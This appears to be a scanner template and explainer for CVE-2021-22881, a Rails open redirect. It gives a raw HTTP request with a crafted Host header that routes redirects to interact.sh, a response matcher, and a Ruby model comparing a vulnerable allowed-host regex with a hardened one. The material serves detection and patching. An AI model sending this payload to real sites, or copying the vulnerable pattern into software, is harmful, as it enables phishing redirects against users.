Ruby on Rails Action Pack before 6.1.2.1 and 6.0.3.5 contains an open redirect: a specially crafted Host header, in combination with certain allowed-host formats, passes host authorization and lets an attacker redirect users to a malicious website. Exploitation requires the attacker to control the Host header of the request.
PoC code [public]
id: CVE-2021-22881

info:
  name: Ruby on Rails - Open Redirect via Host Header Injection
  author: theamanrawat
  severity: medium
  description: |
    Ruby on Rails action pack before 6.1.2.1, 6.0.3.5 contains an open redirect caused by special crafted Host headers in combination with allowed host formats, letting attackers redirect users to malicious websites, exploit requires attacker to control Host headers.
  impact: |
    Attackers can redirect users to malicious sites, potentially leading to phishing or malware distribution.
  remediation: |
    Update to version 6.1.2.1, 6.0.3.5 or later versions.
  reference:
    - https://hackerone.com/reports/1047447
    - https://nvd.nist.gov/vuln/detail/CVE-2021-22881
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-22881
    epss-score: 0.11369
    epss-percentile: 0.93348
    cwe-id: CWE-601
  metadata:
    verified: false
    max-request: 1
  tags: cve,cve2021,ruby,rails,host-header,redirect,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: interact.sh#{{randstr}}.{{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'

      - type: status
        condition: or
        status:
          - 302
          - 301
# digest: 490a004630440220252a303ad891d09b2f0789b8d5b4e40d7a5e46b6be924eb777f5ace17daf13b1022003595a8606da4a341ab2dd3847c4820d99681e180e47c82a896f5f0f747a2617:922c64590222798bb761d5b6d8e72950
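The mechanism this template probes, and what its matcher is looking for, as an added Ruby example that is not from the page, the template author, or Rails itself. It models an allowed-host check with a leading-dot wildcard entry (`.example.com`, an assumed configuration) in a vulnerable form, where any characters may precede the allowed suffix, and a hardened form that only accepts hostname-label characters; the `interact.sh#evil.example.com` Host value is the template's `interact.sh#{{randstr}}.{{Hostname}}` with constructed values. The function and constant names are this example's own.

```ruby
# Added example (not Rails code): how a crafted Host header slips past a
# leading-dot allowed-host check and why the resulting redirect lands on
# interact.sh. All hosts and responses below are constructed.
require "uri"

# VULNERABLE model: ".example.com" becomes (.+\.)?example\.com, so the
# "subdomain" part accepts "#", "@", "/" and anything else.
def vulnerable_host_pattern(allowed_entry)
  if allowed_entry.start_with?(".")
    /\A(.+\.)?#{Regexp.escape(allowed_entry[1..-1])}\z/i
  else
    /\A#{Regexp.escape(allowed_entry)}\z/i
  end
end

# HARDENED model (this example's own choice, in the spirit of restricting the
# character set): only DNS-label characters may precede the allowed suffix.
def hardened_host_pattern(allowed_entry)
  if allowed_entry.start_with?(".")
    /\A(?:[a-z0-9-]+\.)*#{Regexp.escape(allowed_entry[1..-1])}\z/i
  else
    /\A#{Regexp.escape(allowed_entry)}\z/i
  end
end

# Host authorization: strip a trailing port, then test every allowed entry.
def host_allowed?(host_header, allowed, pattern_builder)
  host = host_header.to_s.sub(/:\d+\z/, "")
  allowed.any? { |entry| pattern_builder.call(entry) === host }
end

# A Location header an app builds from the (trusted) request host, as
# redirect_to / url_for style helpers do with an absolute URL.
def location_for(host_header, path = "/")
  "http://#{host_header}#{path}"
end

# Where a browser navigates for that Location: "#" begins the fragment, so the
# authority ends at the first "#" and "evil.example.com/" is never contacted.
def browser_destination_host(location)
  URI.parse(location.split("#", 2).first).host
end

# The template's regex matcher in Ruby form. Ruby's ^ and $ are already line
# anchors, so Nuclei's (?m) prefix is not needed here.
TEMPLATE_LOCATION_RE =
  /^Location\s*?:\s*?(?:https?:\/\/|\/\/)?[a-zA-Z0-9\-_.@]*interact\.sh.*$/

def template_matcher_hits?(raw_response_headers)
  TEMPLATE_LOCATION_RE.match?(raw_response_headers)
end

ALLOWED     = [".example.com"].freeze           # assumed config.hosts entry
ATTACK_HOST = "interact.sh#evil.example.com"    # constructed Host header

if __FILE__ == $PROGRAM_NAME
  [:vulnerable_host_pattern, :hardened_host_pattern].each do |impl|
    ok = host_allowed?(ATTACK_HOST, ALLOWED, method(impl))
    puts "#{impl}: #{ATTACK_HOST.inspect} allowed? #{ok}"
  end
  loc = location_for(ATTACK_HOST)
  puts "Location: #{loc}"
  puts "browser goes to: #{browser_destination_host(loc)}"
  headers = "HTTP/1.1 302 Found\r\nLocation: #{loc}\r\n\r\n"
  puts "template matcher hits? #{template_matcher_hits?(headers)}"
end
```

Run it with `ruby cve-2021-22881-model.rb`: the vulnerable pattern accepts the crafted host and the hardened one rejects it, while still accepting `www.example.com`. Because the template only checks the Location header and a 301/302 status, a target that normally redirects to a different host (e.g. to a canonical domain) will not trigger it, and one that echoes the Host header into a redirect for reasons unrelated to Rails will; confirm the framework and version before filing.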